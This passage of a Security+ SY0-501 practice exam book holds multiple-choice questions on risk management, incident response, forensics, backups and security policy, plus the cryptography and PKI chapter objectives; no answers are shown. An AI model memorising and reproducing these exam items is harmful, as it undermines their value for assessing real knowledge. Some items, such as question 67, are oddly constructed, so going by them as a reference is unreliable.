- D. Antivirus scanner
- 23. Your company’s security policy includes system testing and security awareness training
- guidelines. Which of the following control types is this?
- A. Detective technical control
- B. Preventive technical control
- C. Detective administrative control
- D. Preventive administrative control
- 24. Which step of the incident response process occurs after containment?
- A. Preparation
- B. Recovery
- C. Identification
- D. Eradication
- 25. You are a security administrator for your company and you identify a security risk. You
- decide to continue with the current security plan. However, you develop a contingency
- plan in case the security risk occurs. Which of the following types of risk response
- techniques are you demonstrating?
- A. Accept
- B. Transfer
- C. Avoid
- D. Mitigate
- 26. Which of the following best visually shows the state of a computer at the time it was
- collected by law enforcement?
- A. Screenshots
- B. Identification
- C. Tabletop exercise
- D. Generate hash values
- 27. You are asked to protect the company’s data should a complete disaster occur. Which
- action would be the best option for this request?
- A. Back up all data to tape, and store those tapes at an alternate location within the city.
- B. Back up all data to tape, and store those tapes at an alternate location in another city.
- C. Back up all data to disk, and store the disk in a safe in the company’s basement.
- D. Back up all data to disk, and store the disk in a safe at the network administrator’s
- home.
- 28. Which of the following would not be a purpose of a privacy threshold analysis?
- A. Identify programs and systems that are privacy-sensitive.
- B. Demonstrate the inclusion of privacy considerations during the review of a program
- or system.
- C. Identify systems that are considered a single point of failure.
- D. Demonstrate compliance with privacy laws and regulations.
- 29. You have purchased new laptops for your salespeople. You plan to dispose of the hard
- drives of the former laptops as part of a company computer sale. Which of the following
- methods would you use to properly dispose of the hard drives?
- A. Destruction
- B. Shredding
- C. Purging
- D. Formatting
- 30. You are the head of the IT department of a school and are looking for a way to promote
- safe and responsible use of the Internet for students. With the help of the teachers, you
- develop a document for students to sign that describes methods of accessing the Internet
- on the school’s network. Which of the following best describes this document?
- A. Service level agreement
- B. Acceptable use policy
- C. Incident response plan
- D. Chain of custody
- 31. You are the security administrator and have discovered a malware incident. Which of the
- following responses should you do first?
- A. Recovery
- B. Eradication
- C. Containment
- D. Identification
- 32. You are an IT administrator for a company and you are adding new employees to an
- organization’s identity and access management system. Which of the following best
- describes the process you are performing?
- A. Onboarding
- B. Offboarding
- C. Adverse action
- D. Job rotation
- 33. Your company is partnering with another company and requires systems to be shared.
- Which of the following agreements would outline how the shared systems should be
- interfaced?
- A. BPA
- B. MOU
- C. SLA
- D. ISA
- 34. Mark is an office manager at a local bank branch. He wants to ensure customer information isn’t compromised when the deskside employees are away from their desks for the
- day. What security concept would Mark use to mitigate this concern?
- A. Clean desk
- B. Background checks
- C. Continuing education
- D. Job rotation
- 35. You are a security administrator and advise the web development team to include a
- CAPTCHA on the web page where users register for an account. Which of the following
- controls is this referring to?
- A. Deterrent
- B. Detective
- C. Compensating
- D. Degaussing
- 36. Which of the following is not a common security policy type?
- A. Acceptable use policy
- B. Social media policy
- C. Password policy
- D. Parking policy
- 37. As the IT security officer, you are configuring data label options for your company’s
- research and development file server. Regular users can label documents as contractor,
- public, or internal. Which label should be assigned to company trade secrets?
- A. High
- B. Top secret
- C. Proprietary
- D. Low
- 38. Users are currently accessing their personal email through company computers, so you
- and your IT team have created a security policy for email use. What is the next step after
- creating and approving the email use policy?
- A. Encrypt all user email messages.
- B. Provide security user awareness training.
- C. Provide every employee with their own device to access their personal email.
- D. Forward all personal emails to their company email account.
- 39. Which of the following is not a physical security control?
- A. Motion detector
- B. Fence
- C. Antivirus software
- D. CCTV
- 40. Which of the following might you find in a DRP?
- A. Single point of failure
- B. Prioritized list of critical computer systems
- C. Exposure factor
- D. Asset value
- 41. Your security manager wants to decide which risks to mitigate based on cost. What is this
- an example of?
- A. Quantitative risk assessment
- B. Qualitative risk assessment
- C. Business impact analysis
- D. Threat assessment
- 42. Your company has outsourced its proprietary processes to Acme Corporation. Due to
- technical issues, Acme Corporation wants to include a third-party vendor to help resolve
- the technical issues. Which of the following must Acme Corporation consider before
- sending data to the third party?
- A. This data should be encrypted before it is sent to the third-party vendor.
- B. This may constitute unauthorized data sharing.
- C. This may violate the privileged user role-based awareness training.
- D. This may violate a nondisclosure agreement.
- 43. Zack is a security administrator who has been given permission to run a vulnerability
- scan on the company’s wireless network infrastructure. The results show TCP ports
- 21 and 23 open on most hosts. What port numbers do these refer to? (Choose two.)
- A. FTP
- B. SMTP
- C. Telnet
- D. DNS
- 44. Which of the following backup concepts is the quickest backup but slowest restore?
- A. Incremental
- B. Differential
- C. Full
- D. Snapshots
- 45. Which of the following operations should you undertake to avoid mishandling of tapes,
- removable drives, CDs, and DVDs?
- A. Degaussing
- B. Acceptable use
- C. Data labeling
- D. Wiping
- 46. Which of the following can be classified as a single point of failure?
- A. Failover
- B. A cluster
- C. Load balancing
- D. A configuration
- 47. Which of the following are considered detective controls?
- A. Closed-circuit television (CCTV)
- B. Guard
- C. Firewall
- D. IPS
- 48. Your CIO wants to move the company’s large sets of sensitive data to an SaaS cloud
- provider to limit the storage and infrastructure costs. Both the cloud provider and the
- company are required to have a clear understanding of the security controls that will
- be applied to protect the sensitive data. What type of agreement would the SaaS cloud
- provider and your company initiate?
- A. MOU
- B. BPA
- C. SLA
- D. ISA
- 49. Which of the following is typically included in a BPA?
- A. Clear statements detailing the expectation between a customer and a service provider
- B. The agreement that a specific function or service will be delivered at the agreed-upon
- level of performance
- C. Sharing of profits and losses and the addition or removal of a partner
- D. Security requirements associated with interconnecting IT systems
- 50. Your team powered off the SQL database server for over 7 hours to perform a test. Which
- of the following is the most likely reason for this?
- A. Business impact analysis
- B. Succession plan
- C. Continuity of operations plan
- D. Service level agreement
- 51. Which of the following role-based positions should receive training on how to manage a
- particular system?
- A. Users
- B. Privileged users
- C. Executive users
- D. System owners
- 52. You maintain a network of 150 computers and must determine which hosts are secure and
- which are not. Which of the following tools would best meet your need?
- A. Vulnerability scanner
- B. Protocol analyzer
- C. Port scanner
- D. Password cracker
- 53. You have been instructed to introduce an affected system back into the company’s environment and be sure that it will not lead to another incident. You test, monitor, and validate
- that the system is not being compromised by any other means. Which of the incident
- response processes have you completed?
- A. Lessons learned
- B. Preparation
- C. Recovery
- D. Containment
- 54. You discover that an investigator made a few mistakes during a recent forensic investigation. You want to ensure the investigator follows the appropriate process for the collection,
- analysis, and preservation of evidence. Which of the following terms should you use for this
- process?
- A. Incident handling
- B. Legal hold
- C. Order of volatility
- D. Chain of custody
- 55. You receive a call from the help desk manager stating that there has been an increase
- in calls from users reporting their computers are infected with malware. Which of the
- following incident response steps should be completed first?
- A. Containment
- B. Eradication
- C. Lessons learned
- D. Identification
- 56. Which of the following are examples of custodian security roles? (Choose two.)
- A. Human resources employee
- B. Sales executive
- C. CEO
- D. Server backup operator
- 57. You are the network administrator of your company, and the manager of a retail site
- located across town has complained about the loss of power to their building several
- times this year. The branch manager is asking for a compensating control to overcome the
- power outage. What compensating control would you recommend?
- A. Firewall
- B. Security guard
- C. IDS
- D. Backup generator
- 58. James is a security administrator and is attempting to block unauthorized access to the
- desktop computers within the company’s network. He has configured the computers’
- operating systems to lock after 5 minutes of no activity. What type of security control has
- James implemented?
- A. Preventive
- B. Corrective
- C. Deterrent
- D. Detective
- 59. Which of the following terms best describes sensitive medical information?
- A. AES
- B. PHI
- C. PII
- D. TLS
- 60. An accounting employee changes roles with another accounting employee every 4 months.
- What is this an example of?
- A. Separation of duties
- B. Mandatory vacation
- C. Job rotation
- D. Onboarding
- 61. Which of the following are considered inappropriate places to store backup tapes?
- (Choose two.)
- A. Near a workstation
- B. Near a speaker
- C. Near a CRT monitor
- D. Near an LCD screen
- 62. You are a member of your company’s security response team and have discovered an
- incident within your network. You are instructed to remove and restore the affected
- system. You restore the system with the original disk image and then install patches and
- disable any unnecessary services to harden the system against any future attacks. Which
- incident response process have you completed?
- A. Eradication
- B. Preparation
- C. Containment
- D. Recovery
- 63. You are a security administrator and have decided to implement a unified threat management (UTM) appliance within your network. This appliance will provide antimalware,
- spam filtering, and content inspection along with other protections. Which of the following
- statements best describes the potential problem with this plan?
- A. The protections can only be performed one at a time.
- B. This is a complex plan because you will manage several complex platforms.
- C. This could create the potential for a single point of failure.
- D. You work with a single vendor and its support department.
- 64. You are attending a risk analysis meeting and are asked to define internal threats. Which
- of the following is not considered an internal threat?
- A. Employees accessing external websites through the company’s hosts
- B. Embezzlement
- C. Threat actors compromising a network through a firewall
- D. Users connecting a personal USB thumb drive to a workstation
- 65. You are the network director and are creating the following year’s budget. You submit
- forensic dollar amounts for the cyber incident response team. Which of the following
- would you not submit? (Choose two.)
- A. ALE amounts
- B. SLE amounts
- C. Training expenses
- D. Man-hour expenses
- 66. Computer evidence of a crime is preserved by making an exact copy of the hard disk.
- Which of the following does this demonstrate?
- A. Chain of custody
- B. Order of volatility
- C. Capture system image
- D. Taking screenshots
- 67. Which option is an example of a workstation that is not hardened?
- A. Risk
- B. Threat
- C. Exposure
- D. Mitigate
- 68. Which of the following elements should not be included in the preparation phase of the
- incident response process?
- A. Policy
- B. Lesson learned documentation
- C. Response plan/strategy
- D. Communication
- 69. Which of the following does not minimize security breaches committed by internal
- employees?
- A. Job rotation
- B. Separation of duties
- C. Nondisclosure agreements signed by employees
- D. Mandatory vacations
- 70. You find one of your employees posting negative comments about the company on Facebook
- and Twitter. You also discover the employee is sending negative comments from their
- personal email on the company’s computer. You are asked to implement a policy to help
- the company avoid any negative reputation in the marketplace. Which of the following
- would be the best option to fulfill the request?
- A. Account policy enforcement
- B. Change management
- C. Security policy
- D. Risk assessment
- 71. Which of the following statements best describes a differential backup?
- A. Only the changed portions of files are backed up.
- B. All files are copied to storage media.
- C. Files that have changed since the last full backup are backed up.
- D. Only files that have changed since the last full or incremental backup are backed up.
- 72. During which step of the incident response process does root cause analysis occur?
- A. Preparation
- B. Lessons learned
- C. Containment
- D. Recovery
- 73. Which of the following types of testing can help identify risks? (Choose two.)
- A. Quantitative
- B. Penetration testing
- C. Vulnerability testing
- D. Qualitative
- 74. What can a company do to prevent sensitive data from being retrieved by dumpster
- diving?
- A. Degaussing
- B. Capture system image
- C. Shredding
- D. Wiping
- 75. You are a network administrator and have been asked to send a large file that
- contains PII to an accounting firm. Which of the following protocols would it be best
- to use?
- A. Telnet
- B. FTP
- C. SFTP
- D. SMTP
- 76. Zackary is a network backup engineer and performs a full backup each Sunday evening
- and an incremental backup Monday through Friday evenings. One of the company’s
- network servers crashes on Thursday afternoon. How many backups will Zack need to do
- to restore the server?
- A. Two
- B. Three
- C. Four
- D. Five
- 77. Your company website is hosted by an Internet service provider. Which of the following
- risk response techniques is in use?
- A. Risk avoidance
- B. Risk register
- C. Risk acceptance
- D. Risk mitigation
- 78. A call center leases a new space across town, complete with a functioning computer
- network that mirrors the current live site. A high-speed network link continuously
- synchronizes data between the two sites. Which of the following describes the site at the
- new leased location?
- A. Cold site
- B. Warm site
- C. Hot site
- D. Differential site
- 79. A security administrator is reviewing the company’s continuity plan, and it specifies an
- RTO of 4 hours and an RPO of 1 day. Which of the following is the plan describing?
- A. Systems should be restored within 1 day and should remain operational for at least
- 4 hours.
- B. Systems should be restored within 4 hours and no later than 1 day after the
- incident.
- C. Systems should be restored within 1 day and lose, at most, 4 hours’ worth of data.
- D. Systems should be restored within 4 hours with a loss of 1 day’s worth of data at
- most.
- 80. Which of the following statements is true regarding a data retention policy?
- A. Regulations require financial transactions to be stored for 7 years.
- B. Employees must remove and lock up all sensitive and confidential documents when
- not in use.
- C. It describes a formal process of managing configuration changes made to a
- network.
- D. It is a legal document that describes a mutual agreement between parties.
- 81. You are attending a meeting with your manager and he wants to validate the cost of a
- warm site versus a cold site. Which of the following reasons best justify the cost of a warm
- site? (Choose two.)
- A. Small amount of income loss during long downtime
- B. Large amount of income loss during short downtime
- C. Business contracts enduring no more than 72 hours of downtime
- D. Business contracts enduring no more than 8 hours of downtime
- 82. Recently, company data that was sent over the Internet was intercepted and read by
- hackers. This damaged the company’s reputation with its customers. You have been
- asked to implement a policy that will protect against these attacks. Which of the
- following options would you choose to help protect data that is sent over the Internet?
- (Choose two.)
- A. Confidentiality
- B. Safety
- C. Availability
- D. Integrity
- 83. How do you calculate the annual loss expectancy (ALE) that may occur due to a threat?
- A. Exposure Factor (EF) / Single Loss Expectancy (SLE)
- B. Single Loss Expectancy (SLE) × Annual Rate of Occurrence (ARO)
- C. Asset Value (AV) × Exposure Factor (EF)
- D. Single Loss Expectancy (SLE) / Exposure Factor (EF)
- 84. Which of the following impact scenarios would include severe weather events? (Choose
- two.)
- A. Life
- B. Reputation
- C. Salary
- D. Property
- 85. Which of the following outlines a business goal for system restoration and allowable data
- loss?
- A. RPO
- B. Single point of failure
- C. MTTR
- D. MTBF
- 86. Which of the following is an example of a preventive control? (Choose two.)
- A. Data backups
- B. Security camera
- C. Door alarm
- D. Cable locks
- 87. You are a security administrator for your company and you identify a security risk that
- you do not have in-house skills to address. You decide to acquire contract resources. The
- contractor will be responsible for handling and managing this security risk. Which of
- the following types of risk response techniques are you demonstrating?
- A. Accept
- B. Mitigate
- C. Transfer
- D. Avoid
- 88. You are an IT manager and discovered your department had a break-in, and the company’s
- computers were physically damaged. What type of impact best describes this situation?
- A. Life
- B. Reputation
- C. Property
- D. Safety
- 89. Which of the following would help build informed decisions regarding a specific DRP?
- A. Business impact analysis
- B. ROI analysis
- C. RTO
- D. Life impact
- 90. Each salesperson who travels has a cable lock to lock down their laptop when they step
- away from the device. Which of the following controls does this apply to?
- A. Administrative
- B. Compensating
- C. Deterrent
- D. Preventive
- 91. Which of the following secures access to company data in agreement with management
- policies?
- A. Technical controls
- B. Administrative controls
- C. HTTPS
- D. Integrity
- 92. You are a server administrator for your company’s private cloud. To provide service to
- employees, you are instructed to use reliable hard disks in the server to host a virtual
- environment. Which of the following best describes the reliability of hard drives?
- A. MTTR
- B. RPO
- C. MTBF
- D. ALE
- 93. You are replacing a number of devices with a mobile appliance that combines several
- functions. Which of the following describes the new implementation?
- A. Cloud computing
- B. Load balancing
- C. Single point of failure
- D. Virtualization
- 94. Which of the following can help mitigate adware intrusions?
- A. Antivirus
- B. Antispam
- C. Spyware
- D. Pop-up blocker
- 95. In the initial stages of a forensics investigation, Zack, a security administrator, was given
- the hard drive of the compromised workstation by the incident manager. Which of the
- following data acquisition procedures would Zack need to perform in order to begin the
- analysis? (Choose two.)
- A. Take hashes
- B. Take screenshots
- C. Capture the system image
- D. Start the order of volatility
- 96. Which of the following best describes a Computer Incident Response Team (CIRT)?
- A. Personnel who participate in exercises to practice incident response procedures
- B. Personnel who promptly and correctly handle incidents so they can be quickly
- contained, investigated, and recovered from
- C. A team to identify planning flaws before an actual incident occurs
- D. Team members using a walk-through checklist to ensure understanding of roles in a
- DRP
- 97. Which of the following decreases the success of brute-force attacks?
- A. Password complexity
- B. Password hints
- C. Account lockout threshold
- D. Enforce password history
- 98. A warrant has been issued to investigate a file server that is suspected to be part of an
- organized crime to steal credit card information. You are instructed to follow the order of
- volatility. Which data would you collect first?
- A. RAM
- B. USB flash drive
- C. Hard disk
- D. Swap files
- 99. What should human resources personnel be trained in regarding security policies?
- A. Guidelines and enforcement
- B. Order of volatility
- C. Penetration assessment
- D. Vulnerability assessment
- 100. Which of the following is not a basic concept of computer forensics?
- A. Preserve evidence
- B. Determine if the suspect is guilty based on the findings
- C. Track man-hours and expenses
- D. Interview all witnesses
- 101. The Chief Information Officer (CIO) wants to set up a redundant server location so
- that the production server images can be moved within 36 hours and the servers can be
- restored quickly, should a catastrophic failure occur at the primary location. Which of the
- following can be implemented?
- A. Hot site
- B. Cold site
- C. Warm site
- D. Load balancing
- 102. Choose the correct order of volatility when collecting digital evidence.
- A. Hard disk drive, DVD-R, RAM, swap file
- B. Swap file, RAM, DVD-R, hard disk drive
- C. RAM, DVD-R, swap file, hard disk drive
- D. RAM, swap file, hard disk drive, DVD-R
- 103. Which of the following pieces of information would be summarized in the lessons learned
- phase of the incident response process? (Choose three.)
- A. When the problem was first detected and by whom
- B. How the problem was contained and eradicated
- C. The work that was performed during the recovery
- D. Preparing a company’s team to be ready to handle an incident at a moment’s notice
- 104. You receive a phone call from an employee reporting that their workstation is acting
- strangely. You gather information from the intrusion detection system and notice unusual
- network traffic from the workstation, and you determine the event may be an incident.
- You report the event to your manager, who then begins to collect evidence and prepare for
- the next steps. Which phase of the incident response process is this?
- A. Preparation
- B. Identification
- C. Containment
- D. Eradication
- 105. Your manager has asked you to recommend a way to transmit PII via email and maintain
- its confidentiality. Which of the following options is the best solution?
- A. Hash the information before sending.
- B. Protect the information with a digital signature.
- C. Protect the information by using RAID.
- D. Encrypt the information before sending.
- 106. Which of the following statements best defines change management?
- A. Responding to, containing, analyzing, and recovering from a computer-related incident
- B. Means used to define which access permissions subjects have for a specific object
- C. Procedures followed when configuration changes are made to a network
- D. Categorizing threats and vulnerabilities and their potential impacts to a network
- 107. During which step of the incident response process does identification of incidents that
- can be prevented or mitigated occur?
- A. Containment
- B. Eradication
- C. Preparation
- D. Lessons learned
- 108. Which of the following best describes the disadvantages of quantitative risk analysis
- compared to qualitative risk analysis? (Choose two.)
- A. Quantitative risk analysis requires complex calculations.
- B. Quantitative risk analysis is sometimes subjective.
- C. Quantitative risk analysis is generally scenario-based.
- D. Quantitative risk analysis is more time-consuming than qualitative risk analysis.
- 109. Which of the following are disadvantages of using a cold site? (Choose two.)
- A. Expense
- B. Recovery time
- C. Testing availability
- D. Administration time
- 110. Which of the following policies should be implemented to minimize data loss or theft?
- A. Password policy
- B. PII handling
- C. Chain of custody
- D. Detective control
- 111. Which of the following should a comprehensive data policy include?
- A. Wiping, disposing, storage, retention
- B. Disposing, patching, storage, retention
- C. Storage, retention, virtualization
- D. Onboarding, storage, disposing
- 112. You have revealed a recent intrusion within the company’s network and have decided to
- execute incident response procedures. The incident response team has identified audit
- logs that hold information about the recent security breach. Prior to the incident, a
- security consultant firm recommended that your company install a NTP server within
- the network. Which of the following is a setback the incident response team will likely
- encounter during the assessment?
- A. Order of volatility
- B. Chain of custody
- C. Eradication
- D. Record time offset
- 113. You plan to provide a word processing program to the employees in your company. You
- decide not to install the program on each employee’s workstation but rather have a cloud
- service provider host the application. Which of the following risk response techniques best
- describes the situation?
- A. Risk mitigation
- B. Risk acceptance
- C. Risk avoidance
- D. Risk transfer
- 114. Which of the following statements is true about incremental backup?
- A. It backs up all files.
- B. It backs up all files in a compressed format.
- C. It backs up all new files and any files that have changed since the last full backup
- without resetting the archive bit.
- D. It backs up all new files and any files that have changed since the last full or
- incremental backup and resets the archive bit.
- 115. The chief security officer (CSO) has seen four security breaches during the past
- 2 years. Each breach cost the company $30,000, and a third-party vendor has offered
- to repair the security weakness in the system for $250,000. The breached system is set
- to be replaced in 5 years. Which of the following risk response techniques should the
- CSO use?
- A. Accept the risk.
- B. Transfer the risk.
- C. Avoid the risk.
- D. Mitigate the risk.
- 116. Which of the following would not be a guideline for performing a BIA?
- A. Identify impact scenarios that put your business operations at risk.
- B. Identify mission-essential functions and the critical systems within each function.
- C. Approve and execute changes in order to ensure maximum security and availability
- of IT services.
- D. Calculate RPO, RTO, MTTR, and MTBF.
- 117. You are a network administrator and have purchased two devices that will work as
- failovers for each other. Which of the following does this best demonstrate?
- A. Integrity
- B. Availability
- C. Authentication
- D. Confidentiality
- 118. Your company has lost power and the salespeople cannot take orders because the computers
- and phone systems are unavailable. Which of the following would be the best options to an
- alternate business practice? (Choose two.)
- A. Tell the salespeople to go home for the day until the power is restored.
- B. Tell the salespeople to use their cell phones until the power is restored.
- C. Have the salespeople use paper and pen to take orders until the power is restored.
- D. Have the salespeople instruct customers to fax their orders until the power is
- restored.
- 119. Leigh Ann is the new network administrator for a local community bank. She studies the
- current file server folder structures and permissions. The previous administrator didn’t
- properly secure customer documents in the folders. Leigh Ann assigns appropriate file
- and folder permissions to be sure that only the authorized employees can access the data.
- What security role is Leigh Ann assuming?
- A. Power user
- B. Data owner
- C. User
- D. Custodian
- 120. Which of the following methods is not recommended for removing data from a storage
- media that is used to store confidential information?
- A. Formatting
- B. Shredding
- C. Wiping
- D. Degaussing
- 121. A SQL database server is scheduled for full backups on Sundays at 2:00 a.m. and incremental backups each weeknight at 11:00 p.m. Write verification is enabled, and backup
- tapes are stored off-site at a bank safety deposit box. Which of the following should be
- completed to ensure integrity and confidentiality of the backups? (Choose two.)
- A. Use SSL to encrypt the backup data.
- B. Encrypt the backup data before it is stored off-site.
- C. Ensure that an employee other than the backup operator analyzes each day’s backup
- logs.
- D. Ensure that the employee performing the backup is a member of the administrators’
- group.
- 122. You are planning to perform a security audit and would like to see what type of network
- traffic is transmitting within your company’s network. Which of the following tools
- would you use?
- A. Port scanner
- B. Vulnerability scanner
- C. Protocol analyzer
- D. Network intrusion detection system
- 123. Your company has hired a new administrative assistant to a commercial lender named
- Leigh Ann. She will be using a web browser on a company computer at the office to access
- internal documents on a public cloud provider over the Internet. Which type of document
- should Leigh Ann read and sign?
- A. Internet acceptable use policy
- B. Audit policy
- C. Password policy
- D. Privacy policy
- 124. During a conversation with another colleague, you suggest there is a single point of failure
- in the single load balancer in place for the company’s SQL server. You suggest implementing two load balancers in place with only one in service at a given time. What type of load
- balancing configuration have you described?
- A. Active-active
- B. Active directory
- C. Round robin
- D. Active-passive
- 125. Which of the following policies would you implement to help prevent the company’s users
- from revealing their login credentials for others to view?
- A. Job rotation
- B. Data owner
- C. Clean desk
- D. Separation of duties
- 126. Which of the following are part of the chain of custody?
- A. Delegating evidence collection to your manager
- B. Capturing the system image to another hard drive
- C. Capturing memory contents before capturing hard disk contents
- D. Preserving, protecting, and documenting evidence
- 127. Zackary has been assigned the task of performing a penetration test on a server and was
- given limited information about the inner workings of the server. Which of the following
- tests will he be performing?
- A. White box
- B. Gray box
- C. Black box
- D. Clear box
- 128. Which of the following are considered administrative controls? (Choose two.)
- A. Firewall rules
- B. Personnel hiring policy
- C. Separation of duties
- D. Intrusion prevention system
- 129. Which of the following are examples of alternate business practices? (Choose two.)
- A. The business’s point-of-sale terminal goes down, and employees use pen and paper to
- take orders and a calculator to determine customers’ bills.
- B. The network system crashes due to an update, and employees are told to take time off
- until the company’s network system is restored.
- C. Power is lost at a company’s site and the manager posts a closed sign until power is
- restored.
- D. A bank location has lost power, and the employees are sent to another location to
- resume business.
- 130. Which of the following require careful handling and special policies for data retention and
- distribution? (Choose two.)
- A. Personal electronic devices
- B. MOU
- C. PII
- D. NDA
- 131. Matt is the head of IT security for a university department. He recently read articles about
- security breaches that involved malware on USB removable devices and is concerned about
- future incidents within the university. Matt reviews the past incident responses to determine how these occurrences may be prevented and how to improve the past responses.
- What type of document should Matt prepare?
- A. MOU
- B. SLA
- C. After-action report
- D. Nondisclosure agreement
- 132. Categorizing residual risk is most important to which of the following risk response
- techniques?
- A. Risk mitigation
- B. Risk acceptance
- C. Risk avoidance
- D. Risk transfer
- 133. You are the IT manager and one of your employees asks who assigns data labels. Which of
- the following assigns data labels?
- A. Owner
- B. Custodian
- C. Privacy officer
- D. System administrator
- 134. Which of the following is the most pressing security concern related to social media
- networks?
- A. Other users can view your MAC address.
- B. Other users can view your IP address.
- C. Employees can leak a company’s confidential information.
- D. Employees can express their opinion about their company.
- 135. You are a network administrator looking to test patches quickly and often before pushing
- them out to the production workstations. Which of the following would be the best way
- to do this?
- A. Create a full disk image to restore the system after each patch installation.
- B. Create a virtual machine and utilize snapshots.
- C. Create an incremental backup of an unpatched workstation.
- D. Create a differential backup of an unpatched workstation.
- 136. You have instructed your junior network administrator to test the integrity of the company’s backed-up data. Which of the following is the best way to test the integrity of a
- backup?
- A. Review written procedures.
- B. Use software to recover deleted files.
- C. Restore part of the backup.
- D. Conduct another backup.
- 137. What concept is being used when user accounts are created by one employee and user
- permissions are configured by another employee?
- A. Background checks
- B. Job rotation
- C. Separation of duties
- D. Collusion
- 138. Your company is requesting the installation of a fence around the property and cipher locks
- on all front entrances. Which of the following concepts is your company concerned about?
- A. Confidentiality
- B. Integrity
- C. Availability
- D. Safety
- 139. Which of the following is an example of a vulnerability assessment tool?
- A. Ophcrack
- B. John the Ripper
- C. L0phtCrack
- D. Nessus
- 140. A security analyst is analyzing the cost the company could incur if the customer database
- was breached. The database contains 2,500 records with PII. Studies show the cost per
- record would be $300. The likelihood that the database would be breached in the next
- year is only 5%. Which of the following would be the ALE for a security breach?
- A. $15,000
- B. $37,500
- C. $150,000
- D. $750,000
- 141. Your team must perform a test of a specific system to be sure the system operates at the
- alternate site. The results of the test must be compared with the company’s live environment. Which test is your team performing?
- A. Cutover test
- B. Walk-through
- C. Parallel test
- D. Simulation
- 142. Which of the following concepts defines a company goal for system restoration and
- acceptable data loss?
- A. MTBF
- B. MTTR
- C. RPO
- D. ARO
- 143. Your IT team has created a disaster recovery plan to be used in case a SQL database
- server fails. What type of control is this?
- A. Detective
- B. Corrective
- C. Preventive
- D. Deterrent
- 144. Which of the following is not a step in the incident response process?
- A. Snapshot
- B. Preparation
- C. Recovery
- D. Containment
- 145. Which of the following threats is mitigated by shredding paper documents?
- A. Shoulder surfing
- B. Physical
- C. Adware
- D. Spyware
- 146. Your company hires a third-party auditor to analyze the company’s data backup and
- long-term archiving policy. Which type of organization document should you provide
- to the auditor?
- A. Clean desk policy
- B. Acceptable use policy
- C. Security policy
- D. Data retention policy
- 147. You are a network administrator and have been given the duty of creating users accounts
- for new employees the company has hired. These employees are added to the identity
- and access management system and assigned mobile devices. What process are you
- performing?
- A. Offboarding
- B. System owner
- C. Onboarding
- D. Executive user
- 148. Which of the following defines a standard operating procedure (SOP)? (Choose three.)
- A. Standard
- B. Privacy
- C. Procedure
- D. Guideline
- 149. Computer equipment was suspected to be involved in a computer crime and was seized.
- The computer equipment was left unattended in a corridor for 10 minutes while officers
- restrained a potential suspect. The seized equipment is no longer admissible as evidence
- because of which of the following violations?
- A. Chain of custody
- B. Order of volatility
- C. Preparation
- D. Eradication
- 150. Which of the following should be performed when conducting a qualitative risk analysis?
- (Choose two.)
- A. ARO
- B. SLE
- C. Asset estimation
- D. Rating potential threats
- Chapter 6
- Cryptography and PKI
- The CompTIA Security+ Exam SY0-501 topics covered in this chapter include the following:
- ✓ ✓ 6.1 Compare and contrast basic concepts of cryptography.
- ■ ■ Symmetric algorithms
- ■ ■ Modes of operation
- ■ ■ Asymmetric algorithms
- ■ ■ Hashing
- ■ ■ Salt, IV, nonce
- ■ ■ Elliptic curve
- ■ ■ Weak/deprecated algorithms
- ■ ■ Key exchange
- ■ ■ Digital signatures
- ■ ■ Diffusion
- ■ ■ Confusion
- ■ ■ Collision
- ■ ■ Steganography
- ■ ■ Obfuscation
- ■ ■ Stream vs. block
- ■ ■ Key strength
- ■ ■ Session keys
- ■ ■ Ephemeral key
- ■ ■ Secret algorithm
- ■ ■ Data-in-transit
- ■ ■ Data-at-rest
- ■ ■ Data-in-use
- ■ ■ Random/pseudo-random number generation
- ■ ■ Key stretching
- ■ ■ Implementation vs. algorithm selection
- ■ ■ Crypto service provider
- ■ ■ Crypto modules
- ■ ■ Perfect forward secrecy
- ■ ■ Security through obscurity
- ■ ■ Common use cases
- ■ ■ Low power devices
- ■ ■ Low latency
- ■ ■ High resiliency
- ■ ■ Supporting confidentiality
- ■ ■ Supporting integrity
- ■ ■ Supporting obfuscation
- ■ ■ Supporting authentication
- ■ ■ Supporting non-repudiation
- ■ ■ Resource vs. security constraints
- ✓ ✓ 6.2 Explain cryptography algorithms and their basic characteristics.
- ■ ■ Symmetric algorithms
- ■ ■ AES
- ■ ■ DES
- ■ ■ 3DES
- ■ ■ RC4
- ■ ■ Blowfish/Twofish
- ■ ■ Cipher modes
- ■ ■ CBC
- ■ ■ GCM
- ■ ■ ECB
- ■ ■ CTM
- ■ ■ Stream vs. block
- ■ ■ Asymmetric algorithms
- ■ ■ RSA
- ■ ■ DSA
- ■ ■ Diffie-Hellman
- ■ ■ Groups
- ■ ■ DHE
- ■ ■ ECDHE
- ■ ■ Elliptic curve
- ■ ■ PGP/GPG
- ■ ■ Hashing algorithms
- ■ ■ MD5
- ■ ■ SHA
- ■ ■ HMAC
- ■ ■ RIPEMD
- ■ ■ Key stretching algorithms
- ■ ■ BCRYPT
- ■ ■ PBKDF2
- ■ ■ Obfuscation
- ■ ■ XOR
- ■ ■ ROT13
- ■ ■ Substitution ciphers
- ✓ ✓ 6.3 Given a scenario, install and configure wireless security settings.
- ■ ■ Cryptographic protocols
- ■ ■ WPA
- ■ ■ WPA2
- ■ ■ CCMP
- ■ ■ TKIP
- ■ ■ Authentication protocols
- ■ ■ EAP
- ■ ■ PEAP
- ■ ■ EAP-FAST
- ■ ■ EAP-TLS
- ■ ■ EAP-TTLS
- ■ ■ IEEE 802.1x
- ■ ■ RADIUS Federation
- ■ ■ Methods
- ■ ■ PSK vs. Enterprise vs. Open
- ■ ■ WPS
- ■ ■ Captive portals
- ✓ ✓ 6.4 Given a scenario, implement public key infrastructure.
- ■ ■ Components
- ■ ■ CA
- ■ ■ Intermediate CA
- ■ ■ CRL
- ■ ■ OCSP
- ■ ■ CSR
- ■ ■ Certificate
- ■ ■ Public key
- ■ ■ Private key
- ■ ■ Object identifiers (OID)
- ■ ■ Concepts
- ■ ■ Online vs. offline CA
- ■ ■ Stapling
- ■ ■ Pinning
- ■ ■ Trust model
- ■ ■ Key escrow
- ■ ■ Certificate chaining
- ■ ■ Types of certificates
- ■ ■ Wildcard
- ■ ■ SAN
- ■ ■ Code signing
- ■ ■ Self-signed
- ■ ■ Machine/computer
- ■ ■ Email
- ■ ■ User
- ■ ■ Root
- ■ ■ Domain validation
- ■ ■ Extended validation
- ■ ■ Certificate formats
- ■ ■ DER
- ■ ■ PEM
- ■ ■ PFX
- ■ ■ CER
- ■ ■ P12
- ■ ■ P7B
- 1. Which of the following would a public key be used for?
- A. To decrypt a hash of a digital signature
- B. To encrypt TLS traffic
- C. To digitally sign messages
- D. To decrypt TLS messages
- 2. Your company’s web server certificate has been revoked and external customers are
- receiving errors when they connect to the website. Which of following actions must
